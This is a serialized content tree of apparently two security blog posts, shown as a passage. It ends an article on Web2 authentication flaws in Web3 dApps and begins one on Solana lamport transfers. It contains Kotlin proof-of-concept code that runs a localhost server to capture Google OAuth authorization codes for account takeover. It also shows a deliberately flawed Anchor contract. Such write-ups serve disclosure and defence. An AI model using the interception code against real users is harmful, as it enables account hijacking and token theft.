",{"type":25,"tag":216,"props":74575,"children":74576},{"style":7375},[74577],{"type":31,"value":74578},"Exception",{"type":25,"tag":216,"props":74580,"children":74581},{"style":6964},[74582],{"type":31,"value":18761},{"type":25,"tag":216,"props":74584,"children":74585},{"class":6922,"line":7557},[74586,74590,74594,74598,74602,74606,74611,74615,74620,74624,74628],{"type":25,"tag":216,"props":74587,"children":74588},{"style":6964},[74589],{"type":31,"value":74529},{"type":25,"tag":216,"props":74591,"children":74592},{"style":7047},[74593],{"type":31,"value":2399},{"type":25,"tag":216,"props":74595,"children":74596},{"style":6964},[74597],{"type":31,"value":1850},{"type":25,"tag":216,"props":74599,"children":74600},{"style":8205},[74601],{"type":31,"value":74543},{"type":25,"tag":216,"props":74603,"children":74604},{"style":6964},[74605],{"type":31,"value":7026},{"type":25,"tag":216,"props":74607,"children":74608},{"style":8205},[74609],{"type":31,"value":74610},"\"Error starting server: ",{"type":25,"tag":216,"props":74612,"children":74613},{"style":6936},[74614],{"type":31,"value":38071},{"type":25,"tag":216,"props":74616,"children":74617},{"style":6953},[74618],{"type":31,"value":74619},"e.message",{"type":25,"tag":216,"props":74621,"children":74622},{"style":6936},[74623],{"type":31,"value":38103},{"type":25,"tag":216,"props":74625,"children":74626},{"style":8205},[74627],{"type":31,"value":24020},{"type":25,"tag":216,"props":74629,"children":74630},{"style":6964},[74631],{"type":31,"value":74632},", e)\n",{"type":25,"tag":216,"props":74634,"children":74635},{"class":6922,"line":7574},[74636],{"type":25,"tag":216,"props":74637,"children":74638},{"style":6964},[74639],{"type":31,"value":62852},{"type":25,"tag":216,"props":74641,"children":74642},{"class":6922,"line":7591},[74643],{"type":25,"tag":216,"props":74644,"children":74645},{"style":6964},[74646],{"type":31,"value":7302},{"type":25,"tag":216,"props":74648,"children":74649},{"class":6922,"line":7604},[74650],{"type":25,"tag":216,"props":74651,"children":74652},{"emptyLinePlaceholder":16},[74653],{"type":31,"value":7642},{"type":25,"tag":216,"props":74655,"children":74656},{"class":6922,"line":7613},[74657],{"type":25,"tag":216,"props":74658,"children":74659},{"style":6927},[74660],{"type":31,"value":74661},"        // Open the Google OAuth page\n",{"type":25,"tag":216,"props":74663,"children":74664},{"class":6922,"line":7636},[74665,74670,74675,74679],{"type":25,"tag":216,"props":74666,"children":74667},{"style":6936},[74668],{"type":31,"value":74669},"        val",{"type":25,"tag":216,"props":74671,"children":74672},{"style":6964},[74673],{"type":31,"value":74674}," googleOAuthUrl ",{"type":25,"tag":216,"props":74676,"children":74677},{"style":6953},[74678],{"type":31,"value":266},{"type":25,"tag":216,"props":74680,"children":74681},{"style":8205},[74682],{"type":31,"value":74683}," \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n",{"type":25,"tag":216,"props":74685,"children":74686},{"class":6922,"line":7645},[74687,74691,74696,74700,74705,74710,74714],{"type":25,"tag":216,"props":74688,"children":74689},{"style":6936},[74690],{"type":31,"value":74669},{"type":25,"tag":216,"props":74692,"children":74693},{"style":6964},[74694],{"type":31,"value":74695}," browserIntent ",{"type":25,"tag":216,"props":74697,"children":74698},{"style":6953},[74699],{"type":31,"value":266},{"type":25,"tag":216,"props":74701,"children":74702},{"style":7047},[74703],{"type":31,"value":74704}," Intent",{"type":25,"tag":216,"props":74706,"children":74707},{"style":6964},[74708],{"type":31,"value":74709},"(Intent.ACTION_VIEW, Uri.",{"type":25,"tag":216,"props":74711,"children":74712},{"style":7047},[74713],{"type":31,"value":43175},{"type":25,"tag":216,"props":74715,"children":74716},{"style":6964},[74717],{"type":31,"value":74718},"(googleOAuthUrl))\n",{"type":25,"tag":216,"props":74720,"children":74721},{"class":6922,"line":7654},[74722,74727],{"type":25,"tag":216,"props":74723,"children":74724},{"style":7047},[74725],{"type":31,"value":74726},"        startActivity",{"type":25,"tag":216,"props":74728,"children":74729},{"style":6964},[74730],{"type":31,"value":74731},"(browserIntent)\n",{"type":25,"tag":216,"props":74733,"children":74734},{"class":6922,"line":7722},[74735],{"type":25,"tag":216,"props":74736,"children":74737},{"style":6964},[74738],{"type":31,"value":7311},{"type":25,"tag":216,"props":74740,"children":74741},{"class":6922,"line":7730},[74742],{"type":25,"tag":216,"props":74743,"children":74744},{"emptyLinePlaceholder":16},[74745],{"type":31,"value":7642},{"type":25,"tag":216,"props":74747,"children":74748},{"class":6922,"line":7760},[74749,74754,74758,74763],{"type":25,"tag":216,"props":74750,"children":74751},{"style":6936},[74752],{"type":31,"value":74753},"    private",{"type":25,"tag":216,"props":74755,"children":74756},{"style":6936},[74757],{"type":31,"value":10158},{"type":25,"tag":216,"props":74759,"children":74760},{"style":7047},[74761],{"type":31,"value":74762}," startWebServer",{"type":25,"tag":216,"props":74764,"children":74765},{"style":6964},[74766],{"type":31,"value":19694},{"type":25,"tag":216,"props":74768,"children":74769},{"class":6922,"line":7768},[74770,74775,74780,74784,74789],{"type":25,"tag":216,"props":74771,"children":74772},{"style":7047},[74773],{"type":31,"value":74774},"        embeddedServer",{"type":25,"tag":216,"props":74776,"children":74777},{"style":6964},[74778],{"type":31,"value":74779},"(CIO, port ",{"type":25,"tag":216,"props":74781,"children":74782},{"style":6953},[74783],{"type":31,"value":266},{"type":25,"tag":216,"props":74785,"children":74786},{"style":6989},[74787],{"type":31,"value":74788}," 3000",{"type":25,"tag":216,"props":74790,"children":74791},{"style":6964},[74792],{"type":31,"value":18761},{"type":25,"tag":216,"props":74794,"children":74795},{"class":6922,"line":7800},[74796,74801],{"type":25,"tag":216,"props":74797,"children":74798},{"style":7047},[74799],{"type":31,"value":74800},"            routing",{"type":25,"tag":216,"props":74802,"children":74803},{"style":6964},[74804],{"type":31,"value":7241},{"type":25,"tag":216,"props":74806,"children":74807},{"class":6922,"line":7808},[74808,74813,74817,74822],{"type":25,"tag":216,"props":74809,"children":74810},{"style":6936},[74811],{"type":31,"value":74812},"                get",{"type":25,"tag":216,"props":74814,"children":74815},{"style":6964},[74816],{"type":31,"value":1850},{"type":25,"tag":216,"props":74818,"children":74819},{"style":8205},[74820],{"type":31,"value":74821},"\"{...}\"",{"type":25,"tag":216,"props":74823,"children":74824},{"style":6964},[74825],{"type":31,"value":18761},{"type":25,"tag":216,"props":74827,"children":74828},{"class":6922,"line":7868},[74829,74834,74839],{"type":25,"tag":216,"props":74830,"children":74831},{"style":6964},[74832],{"type":31,"value":74833},"                    call.",{"type":25,"tag":216,"props":74835,"children":74836},{"style":7047},[74837],{"type":31,"value":74838},"respondHtml",{"type":25,"tag":216,"props":74840,"children":74841},{"style":6964},[74842],{"type":31,"value":7241},{"type":25,"tag":216,"props":74844,"children":74845},{"class":6922,"line":13001},[74846,74851],{"type":25,"tag":216,"props":74847,"children":74848},{"style":7047},[74849],{"type":31,"value":74850},"                        head",{"type":25,"tag":216,"props":74852,"children":74853},{"style":6964},[74854],{"type":31,"value":7241},{"type":25,"tag":216,"props":74856,"children":74857},{"class":6922,"line":13019},[74858,74863,74868,74872,74877],{"type":25,"tag":216,"props":74859,"children":74860},{"style":7047},[74861],{"type":31,"value":74862},"                            meta",{"type":25,"tag":216,"props":74864,"children":74865},{"style":6964},[74866],{"type":31,"value":74867},"(charset ",{"type":25,"tag":216,"props":74869,"children":74870},{"style":6953},[74871],{"type":31,"value":266},{"type":25,"tag":216,"props":74873,"children":74874},{"style":8205},[74875],{"type":31,"value":74876}," \"UTF-8\"",{"type":25,"tag":216,"props":74878,"children":74879},{"style":6964},[74880],{"type":31,"value":7107},{"type":25,"tag":216,"props":74882,"children":74883},{"class":6922,"line":13064},[74884,74888,74893,74897,74902,74907,74911,74916],{"type":25,"tag":216,"props":74885,"children":74886},{"style":7047},[74887],{"type":31,"value":74862},{"type":25,"tag":216,"props":74889,"children":74890},{"style":6964},[74891],{"type":31,"value":74892},"(name ",{"type":25,"tag":216,"props":74894,"children":74895},{"style":6953},[74896],{"type":31,"value":266},{"type":25,"tag":216,"props":74898,"children":74899},{"style":8205},[74900],{"type":31,"value":74901}," \"viewport\"",{"type":25,"tag":216,"props":74903,"children":74904},{"style":6964},[74905],{"type":31,"value":74906},", content ",{"type":25,"tag":216,"props":74908,"children":74909},{"style":6953},[74910],{"type":31,"value":266},{"type":25,"tag":216,"props":74912,"children":74913},{"style":8205},[74914],{"type":31,"value":74915}," \"width=device-width, initial-scale=1.0\"",{"type":25,"tag":216,"props":74917,"children":74918},{"style":6964},[74919],{"type":31,"value":7107},{"type":25,"tag":216,"props":74921,"children":74922},{"class":6922,"line":13170},[74923,74928,74932,74937],{"type":25,"tag":216,"props":74924,"children":74925},{"style":7047},[74926],{"type":31,"value":74927},"                            title",{"type":25,"tag":216,"props":74929,"children":74930},{"style":6964},[74931],{"type":31,"value":1850},{"type":25,"tag":216,"props":74933,"children":74934},{"style":8205},[74935],{"type":31,"value":74936},"\"OAuth Redirect\"",{"type":25,"tag":216,"props":74938,"children":74939},{"style":6964},[74940],{"type":31,"value":7107},{"type":25,"tag":216,"props":74942,"children":74943},{"class":6922,"line":27455},[74944],{"type":25,"tag":216,"props":74945,"children":74946},{"style":6964},[74947],{"type":31,"value":74948},"                        }\n",{"type":25,"tag":216,"props":74950,"children":74951},{"class":6922,"line":27490},[74952,74957],{"type":25,"tag":216,"props":74953,"children":74954},{"style":7047},[74955],{"type":31,"value":74956},"                        body",{"type":25,"tag":216,"props":74958,"children":74959},{"style":6964},[74960],{"type":31,"value":7241},{"type":25,"tag":216,"props":74962,"children":74963},{"class":6922,"line":27498},[74964,74969,74973,74977,74982],{"type":25,"tag":216,"props":74965,"children":74966},{"style":7047},[74967],{"type":31,"value":74968},"                            h1",{"type":25,"tag":216,"props":74970,"children":74971},{"style":6964},[74972],{"type":31,"value":13542},{"type":25,"tag":216,"props":74974,"children":74975},{"style":6953},[74976],{"type":31,"value":3539},{"type":25,"tag":216,"props":74978,"children":74979},{"style":8205},[74980],{"type":31,"value":74981},"\"Google OAuth Redirect\"",{"type":25,"tag":216,"props":74983,"children":74984},{"style":6964},[74985],{"type":31,"value":13552},{"type":25,"tag":216,"props":74987,"children":74988},{"class":6922,"line":27506},[74989,74994],{"type":25,"tag":216,"props":74990,"children":74991},{"style":7047},[74992],{"type":31,"value":74993},"                            script",{"type":25,"tag":216,"props":74995,"children":74996},{"style":6964},[74997],{"type":31,"value":7241},{"type":25,"tag":216,"props":74999,"children":75000},{"class":6922,"line":27515},[75001,75006],{"type":25,"tag":216,"props":75002,"children":75003},{"style":6953},[75004],{"type":31,"value":75005},"                                +",{"type":25,"tag":216,"props":75007,"children":75008},{"style":8205},[75009],{"type":31,"value":75010},"\"document.body.innerText = location.search;\"\n",{"type":25,"tag":216,"props":75012,"children":75013},{"class":6922,"line":27557},[75014],{"type":25,"tag":216,"props":75015,"children":75016},{"style":6964},[75017],{"type":31,"value":75018},"                            }\n",{"type":25,"tag":216,"props":75020,"children":75021},{"class":6922,"line":27590},[75022],{"type":25,"tag":216,"props":75023,"children":75024},{"style":6964},[75025],{"type":31,"value":74948},{"type":25,"tag":216,"props":75027,"children":75028},{"class":6922,"line":27598},[75029],{"type":25,"tag":216,"props":75030,"children":75031},{"style":6964},[75032],{"type":31,"value":75033},"                    }\n",{"type":25,"tag":216,"props":75035,"children":75036},{"class":6922,"line":27606},[75037],{"type":25,"tag":216,"props":75038,"children":75039},{"style":6964},[75040],{"type":31,"value":75041},"                }\n",{"type":25,"tag":216,"props":75043,"children":75044},{"class":6922,"line":27615},[75045],{"type":25,"tag":216,"props":75046,"children":75047},{"style":6964},[75048],{"type":31,"value":62852},{"type":25,"tag":216,"props":75050,"children":75051},{"class":6922,"line":27691},[75052,75057,75062,75067,75071,75075],{"type":25,"tag":216,"props":75053,"children":75054},{"style":6964},[75055],{"type":31,"value":75056},"        }.",{"type":25,"tag":216,"props":75058,"children":75059},{"style":7047},[75060],{"type":31,"value":75061},"start",{"type":25,"tag":216,"props":75063,"children":75064},{"style":6964},[75065],{"type":31,"value":75066},"(wait ",{"type":25,"tag":216,"props":75068,"children":75069},{"style":6953},[75070],{"type":31,"value":266},{"type":25,"tag":216,"props":75072,"children":75073},{"style":6936},[75074],{"type":31,"value":16425},{"type":25,"tag":216,"props":75076,"children":75077},{"style":6964},[75078],{"type":31,"value":7107},{"type":25,"tag":216,"props":75080,"children":75081},{"class":6922,"line":27724},[75082],{"type":25,"tag":216,"props":75083,"children":75084},{"style":6964},[75085],{"type":31,"value":7311},{"type":25,"tag":216,"props":75087,"children":75088},{"class":6922,"line":27732},[75089],{"type":25,"tag":216,"props":75090,"children":75091},{"style":6964},[75092],{"type":31,"value":7874},{"type":25,"tag":38,"props":75094,"children":75095},{},[75096],{"type":31,"value":75097},"The code essentially creates a localhost web server and redirects the user to the OAuth authorization screen, which can be automatically bypassed under certain conditionswithout any user interaction. Once the authorization process is completed, the OAuth flow redirects the user back to the localhost server, including the secret authorization token in the query string.",{"type":25,"tag":38,"props":75099,"children":75100},{},[75101],{"type":31,"value":75102},"Since the attacker controls the localhost server, they can intercept and extract the token, enabling them to take over the victim's account.",{"type":25,"tag":606,"props":75104,"children":75106},{"id":75105},"mitigation-1",[75107],{"type":31,"value":44300},{"type":25,"tag":38,"props":75109,"children":75110},{},[75111,75113,75118],{"type":31,"value":75112},"As a mitigation measure, it is crucial to ensure that localhost servers are not whitelisted in the OAuth ",{"type":25,"tag":82,"props":75114,"children":75116},{"className":75115},[],[75117],{"type":31,"value":73735},{"type":31,"value":75119}," parameter. If whitelisting localhost is necessary due to specific business requirements, a custom solution must be carefully designed and implemented to safeguard the account security of all users.",{"type":25,"tag":26,"props":75121,"children":75122},{"id":32892},[75123],{"type":31,"value":22907},{"type":25,"tag":38,"props":75125,"children":75126},{},[75127],{"type":31,"value":75128},"In this article, we explored three lesser-known classes of vulnerabilities present in Web2 authentication flows utilized by Web3 dApps, shedding light on critical but often overlooked security risks. Authentication processes are inherently complex, and this complexity leaves room for vulnerabilities to persist unnoticed in applications.",{"type":25,"tag":38,"props":75130,"children":75131},{},[75132],{"type":31,"value":75133},"By uncovering and analyzing these vulnerabilities, we aim to stress the necessity of adopting a robust, holistic approach to authentication security. As Web3 continues to evolve, bridging the gap between traditional Web2 frameworks and the decentralized Web3 ecosystem is not just an opportunity but an imperative to safeguard users and their data.",{"type":25,"tag":9316,"props":75135,"children":75136},{},[75137],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":75139},[75140,75147,75152,75155],{"id":73503,"depth":6769,"text":73506,"children":75141},[75142,75143,75144,75145,75146],{"id":73514,"depth":6778,"text":73517},{"id":73541,"depth":6778,"text":73544},{"id":73602,"depth":6778,"text":73605},{"id":73659,"depth":6778,"text":73662},{"id":73758,"depth":6778,"text":73761},{"id":73804,"depth":6769,"text":73807,"children":75148},[75149,75150,75151],{"id":73810,"depth":6778,"text":73813},{"id":73837,"depth":6778,"text":73840},{"id":44297,"depth":6778,"text":44300},{"id":74286,"depth":6769,"text":74289,"children":75153},[75154],{"id":75105,"depth":6778,"text":44300},{"id":32892,"depth":6769,"text":22907},"content:blog:2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3",{"_path":75160,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":75161,"description":75162,"author":44416,"image":75163,"date":75165,"isFeatured":16,"tags":75166,"onBlogPage":16,"body":75167,"_type":6798,"_id":79821,"_source":6800,"_file":79822,"_stem":79823,"_extension":6803},"/blog/2025-05-14-king-of-the-sol","Solana: The hidden dangers of lamport transfers","Solana’s lamport transfer logic hides dangerous edge cases — from rent-exemption quirks to write-demotion traps. We dissect a deceptively simple smart contract game to expose how transfers to arbitrary accounts can silently fail, brick your program, or crown an eternal king.",{"src":75164,"height":17580,"width":17580},"/posts/king-of-the-sol/king-of-the-sol.png","2025-05-14",[6815],{"type":22,"children":75168,"toc":79810},[75169,75173,75178,75192,75198,75203,75233,75238,75243,76281,76286,76294,76299,76305,76311,76323,76356,76368,76381,76393,76838,76843,76889,76895,76900,76987,76992,77006,77019,77682,77687,77699,77705,77716,77728,77882,77896,77915,77936,77942,77947,78292,78297,78303,78322,78336,78958,78963,78983,78988,78993,78999,79011,79032,79207,79213,79218,79519,79540,79552,79564,79648,79668,79680,79686,79698,79704,79709,79732,79744,79750,79762,79767,79773,79778,79783,79801,79806],{"type":25,"tag":26,"props":75170,"children":75171},{"id":32975},[75172],{"type":31,"value":32978},{"type":25,"tag":38,"props":75174,"children":75175},{},[75176],{"type":31,"value":75177},"Is it safe to transfer lamports to an arbitrary address on Solana? The answer might surprise you.",{"type":25,"tag":38,"props":75179,"children":75180},{},[75181,75183,75190],{"type":31,"value":75182},"In this post, we explore a deceptively simple smart contract game inspired by ",{"type":25,"tag":162,"props":75184,"children":75187},{"href":75185,"rel":75186},"https://www.kingoftheether.com/thrones/kingoftheether/index.html",[166],[75188],{"type":31,"value":75189},"King of the Ether",{"type":31,"value":75191},". Through it, we’ll highlight subtle pitfalls in Solana’s account model that can brick your program — especially when it comes to transferring lamports.",{"type":25,"tag":26,"props":75193,"children":75195},{"id":75194},"the-game-king-of-the-sol",[75196],{"type":31,"value":75197},"The Game: King of the SOL",{"type":25,"tag":38,"props":75199,"children":75200},{},[75201],{"type":31,"value":75202},"The game works like this:",{"type":25,"tag":2039,"props":75204,"children":75205},{},[75206,75218,75223,75228],{"type":25,"tag":2043,"props":75207,"children":75208},{},[75209,75211,75216],{"type":31,"value":75210},"Anyone can become the ",{"type":25,"tag":9273,"props":75212,"children":75213},{},[75214],{"type":31,"value":75215},"king",{"type":31,"value":75217}," by bidding at least 2× the previous bid.",{"type":25,"tag":2043,"props":75219,"children":75220},{},[75221],{"type":31,"value":75222},"The old king is reimbursed 95% of their bid.",{"type":25,"tag":2043,"props":75224,"children":75225},{},[75226],{"type":31,"value":75227},"The remaining 5% goes into a prize pot.",{"type":25,"tag":2043,"props":75229,"children":75230},{},[75231],{"type":31,"value":75232},"If the reigning king survives for 10 days without being dethroned, they can claim the entire pot.",{"type":25,"tag":38,"props":75234,"children":75235},{},[75236],{"type":31,"value":75237},"Simple, right?",{"type":25,"tag":38,"props":75239,"children":75240},{},[75241],{"type":31,"value":75242},"This is the core logic:",{"type":25,"tag":206,"props":75244,"children":75246},{"className":6915,"code":75245,"language":6914,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    /// CHECK: any writable account is allowed as a new king.\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n\n#[program]\npub mod king_of_the_sol {\n    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n        // Check that bid_amount is at least 2x last_bid_amount\n        assert!(bid_amount >= ctx.accounts.throne.last_bid_amount * 2);\n        transfer_from_signer(\n            &ctx.accounts.payer,\n            &ctx.accounts.throne.to_account_info(),\n            bid_amount,\n        )?;\n\n        // Reimburse 95% of the last bid to the old king\n        let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n        transfer_from_pda(\n            &ctx.accounts.throne.to_account_info(),\n            &ctx.accounts.old_king,\n            to_reimburse,\n        )?;\n\n        // Set new king\n        ctx.accounts.throne.king = ctx.accounts.new_king.key();\n        ctx.accounts.throne.last_bid_amount = bid_amount;\n        ctx.accounts.throne.last_time = Clock::get()?.unix_timestamp as u64;\n\n        Ok(())\n    }\n}\n",[75247],{"type":25,"tag":82,"props":75248,"children":75249},{"__ignoreMap":7},[75250,75265,75293,75308,75349,75356,75364,75415,75446,75453,75461,75476,75508,75515,75530,75561,75568,75575,75583,75600,75674,75682,75743,75755,75783,75823,75835,75851,75858,75866,75940,75952,75991,76019,76031,76046,76053,76061,76131,76175,76249,76256,76267,76274],{"type":25,"tag":216,"props":75251,"children":75252},{"class":6922,"line":6923},[75253,75257,75261],{"type":25,"tag":216,"props":75254,"children":75255},{"style":6964},[75256],{"type":31,"value":26783},{"type":25,"tag":216,"props":75258,"children":75259},{"style":7375},[75260],{"type":31,"value":26788},{"type":25,"tag":216,"props":75262,"children":75263},{"style":6964},[75264],{"type":31,"value":24218},{"type":25,"tag":216,"props":75266,"children":75267},{"class":6922,"line":6769},[75268,75272,75276,75281,75285,75289],{"type":25,"tag":216,"props":75269,"children":75270},{"style":6936},[75271],{"type":31,"value":17647},{"type":25,"tag":216,"props":75273,"children":75274},{"style":6936},[75275],{"type":31,"value":25111},{"type":25,"tag":216,"props":75277,"children":75278},{"style":7375},[75279],{"type":31,"value":75280}," ChangeKing",{"type":25,"tag":216,"props":75282,"children":75283},{"style":6964},[75284],{"type":31,"value":26868},{"type":25,"tag":216,"props":75286,"children":75287},{"style":7375},[75288],{"type":31,"value":26873},{"type":25,"tag":216,"props":75290,"children":75291},{"style":6964},[75292],{"type":31,"value":11233},{"type":25,"tag":216,"props":75294,"children":75295},{"class":6922,"line":6778},[75296,75300,75304],{"type":25,"tag":216,"props":75297,"children":75298},{"style":6964},[75299],{"type":31,"value":27075},{"type":25,"tag":216,"props":75301,"children":75302},{"style":6936},[75303],{"type":31,"value":7691},{"type":25,"tag":216,"props":75305,"children":75306},{"style":6964},[75307],{"type":31,"value":24218},{"type":25,"tag":216,"props":75309,"children":75310},{"class":6922,"line":7005},[75311,75315,75320,75324,75328,75332,75336,75340,75345],{"type":25,"tag":216,"props":75312,"children":75313},{"style":6936},[75314],{"type":31,"value":24803},{"type":25,"tag":216,"props":75316,"children":75317},{"style":6947},[75318],{"type":31,"value":75319}," throne",{"type":25,"tag":216,"props":75321,"children":75322},{"style":6953},[75323],{"type":31,"value":1472},{"type":25,"tag":216,"props":75325,"children":75326},{"style":7375},[75327],{"type":31,"value":27040},{"type":25,"tag":216,"props":75329,"children":75330},{"style":6964},[75331],{"type":31,"value":26868},{"type":25,"tag":216,"props":75333,"children":75334},{"style":7375},[75335],{"type":31,"value":26873},{"type":25,"tag":216,"props":75337,"children":75338},{"style":6964},[75339],{"type":31,"value":7026},{"type":25,"tag":216,"props":75341,"children":75342},{"style":7375},[75343],{"type":31,"value":75344},"Throne",{"type":25,"tag":216,"props":75346,"children":75347},{"style":6964},[75348],{"type":31,"value":10089},{"type":25,"tag":216,"props":75350,"children":75351},{"class":6922,"line":7110},[75352],{"type":25,"tag":216,"props":75353,"children":75354},{"emptyLinePlaceholder":16},[75355],{"type":31,"value":7642},{"type":25,"tag":216,"props":75357,"children":75358},{"class":6922,"line":7216},[75359],{"type":25,"tag":216,"props":75360,"children":75361},{"style":6927},[75362],{"type":31,"value":75363},"    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n",{"type":25,"tag":216,"props":75365,"children":75366},{"class":6922,"line":7244},[75367,75371,75375,75380,75384,75389,75393,75398,75402,75406,75410],{"type":25,"tag":216,"props":75368,"children":75369},{"style":6964},[75370],{"type":31,"value":27075},{"type":25,"tag":216,"props":75372,"children":75373},{"style":6936},[75374],{"type":31,"value":7691},{"type":25,"tag":216,"props":75376,"children":75377},{"style":6964},[75378],{"type":31,"value":75379},", constraint ",{"type":25,"tag":216,"props":75381,"children":75382},{"style":6953},[75383],{"type":31,"value":266},{"type":25,"tag":216,"props":75385,"children":75386},{"style":6964},[75387],{"type":31,"value":75388}," old_king",{"type":25,"tag":216,"props":75390,"children":75391},{"style":6953},[75392],{"type":31,"value":179},{"type":25,"tag":216,"props":75394,"children":75395},{"style":6964},[75396],{"type":31,"value":75397},"key() ",{"type":25,"tag":216,"props":75399,"children":75400},{"style":6953},[75401],{"type":31,"value":12528},{"type":25,"tag":216,"props":75403,"children":75404},{"style":6964},[75405],{"type":31,"value":75319},{"type":25,"tag":216,"props":75407,"children":75408},{"style":6953},[75409],{"type":31,"value":179},{"type":25,"tag":216,"props":75411,"children":75412},{"style":6964},[75413],{"type":31,"value":75414},"king)]\n",{"type":25,"tag":216,"props":75416,"children":75417},{"class":6922,"line":7257},[75418,75422,75426,75430,75434,75438,75442],{"type":25,"tag":216,"props":75419,"children":75420},{"style":6936},[75421],{"type":31,"value":24803},{"type":25,"tag":216,"props":75423,"children":75424},{"style":6947},[75425],{"type":31,"value":75388},{"type":25,"tag":216,"props":75427,"children":75428},{"style":6953},[75429],{"type":31,"value":1472},{"type":25,"tag":216,"props":75431,"children":75432},{"style":7375},[75433],{"type":31,"value":29356},{"type":25,"tag":216,"props":75435,"children":75436},{"style":6964},[75437],{"type":31,"value":26868},{"type":25,"tag":216,"props":75439,"children":75440},{"style":7375},[75441],{"type":31,"value":26873},{"type":25,"tag":216,"props":75443,"children":75444},{"style":6964},[75445],{"type":31,"value":10089},{"type":25,"tag":216,"props":75447,"children":75448},{"class":6922,"line":7275},[75449],{"type":25,"tag":216,"props":75450,"children":75451},{"emptyLinePlaceholder":16},[75452],{"type":31,"value":7642},{"type":25,"tag":216,"props":75454,"children":75455},{"class":6922,"line":7296},[75456],{"type":25,"tag":216,"props":75457,"children":75458},{"style":6927},[75459],{"type":31,"value":75460},"    /// CHECK: any writable account is allowed as a new king.\n",{"type":25,"tag":216,"props":75462,"children":75463},{"class":6922,"line":7305},[75464,75468,75472],{"type":25,"tag":216,"props":75465,"children":75466},{"style":6964},[75467],{"type":31,"value":27075},{"type":25,"tag":216,"props":75469,"children":75470},{"style":6936},[75471],{"type":31,"value":7691},{"type":25,"tag":216,"props":75473,"children":75474},{"style":6964},[75475],{"type":31,"value":24218},{"type":25,"tag":216,"props":75477,"children":75478},{"class":6922,"line":7557},[75479,75483,75488,75492,75496,75500,75504],{"type":25,"tag":216,"props":75480,"children":75481},{"style":6936},[75482],{"type":31,"value":24803},{"type":25,"tag":216,"props":75484,"children":75485},{"style":6947},[75486],{"type":31,"value":75487}," new_king",{"type":25,"tag":216,"props":75489,"children":75490},{"style":6953},[75491],{"type":31,"value":1472},{"type":25,"tag":216,"props":75493,"children":75494},{"style":7375},[75495],{"type":31,"value":29356},{"type":25,"tag":216,"props":75497,"children":75498},{"style":6964},[75499],{"type":31,"value":26868},{"type":25,"tag":216,"props":75501,"children":75502},{"style":7375},[75503],{"type":31,"value":26873},{"type":25,"tag":216,"props":75505,"children":75506},{"style":6964},[75507],{"type":31,"value":10089},{"type":25,"tag":216,"props":75509,"children":75510},{"class":6922,"line":7574},[75511],{"type":25,"tag":216,"props":75512,"children":75513},{"emptyLinePlaceholder":16},[75514],{"type":31,"value":7642},{"type":25,"tag":216,"props":75516,"children":75517},{"class":6922,"line":7591},[75518,75522,75526],{"type":25,"tag":216,"props":75519,"children":75520},{"style":6964},[75521],{"type":31,"value":27075},{"type":25,"tag":216,"props":75523,"children":75524},{"style":6936},[75525],{"type":31,"value":7691},{"type":25,"tag":216,"props":75527,"children":75528},{"style":6964},[75529],{"type":31,"value":24218},{"type":25,"tag":216,"props":75531,"children":75532},{"class":6922,"line":7604},[75533,75537,75541,75545,75549,75553,75557],{"type":25,"tag":216,"props":75534,"children":75535},{"style":6936},[75536],{"type":31,"value":24803},{"type":25,"tag":216,"props":75538,"children":75539},{"style":6947},[75540],{"type":31,"value":46206},{"type":25,"tag":216,"props":75542,"children":75543},{"style":6953},[75544],{"type":31,"value":1472},{"type":25,"tag":216,"props":75546,"children":75547},{"style":7375},[75548],{"type":31,"value":27104},{"type":25,"tag":216,"props":75550,"children":75551},{"style":6964},[75552],{"type":31,"value":26868},{"type":25,"tag":216,"props":75554,"children":75555},{"style":7375},[75556],{"type":31,"value":26873},{"type":25,"tag":216,"props":75558,"children":75559},{"style":6964},[75560],{"type":31,"value":10089},{"type":25,"tag":216,"props":75562,"children":75563},{"class":6922,"line":7613},[75564],{"type":25,"tag":216,"props":75565,"children":75566},{"style":6964},[75567],{"type":31,"value":7874},{"type":25,"tag":216,"props":75569,"children":75570},{"class":6922,"line":7636},[75571],{"type":25,"tag":216,"props":75572,"children":75573},{"emptyLinePlaceholder":16},[75574],{"type":31,"value":7642},{"type":25,"tag":216,"props":75576,"children":75577},{"class":6922,"line":7645},[75578],{"type":25,"tag":216,"props":75579,"children":75580},{"style":6964},[75581],{"type":31,"value":75582},"#[program]\n",{"type":25,"tag":216,"props":75584,"children":75585},{"class":6922,"line":7654},[75586,75590,75595],{"type":25,"tag":216,"props":75587,"children":75588},{"style":6936},[75589],{"type":31,"value":17647},{"type":25,"tag":216,"props":75591,"children":75592},{"style":6936},[75593],{"type":31,"value":75594}," mod",{"type":25,"tag":216,"props":75596,"children":75597},{"style":6964},[75598],{"type":31,"value":75599}," king_of_the_sol {\n",{"type":25,"tag":216,"props":75601,"children":75602},{"class":6922,"line":7722},[75603,75607,75611,75616,75620,75624,75628,75632,75636,75641,75645,75650,75654,75658,75662,75666,75670],{"type":25,"tag":216,"props":75604,"children":75605},{"style":6936},[75606],{"type":31,"value":24803},{"type":25,"tag":216,"props":75608,"children":75609},{"style":6936},[75610],{"type":31,"value":17652},{"type":25,"tag":216,"props":75612,"children":75613},{"style":7047},[75614],{"type":31,"value":75615}," 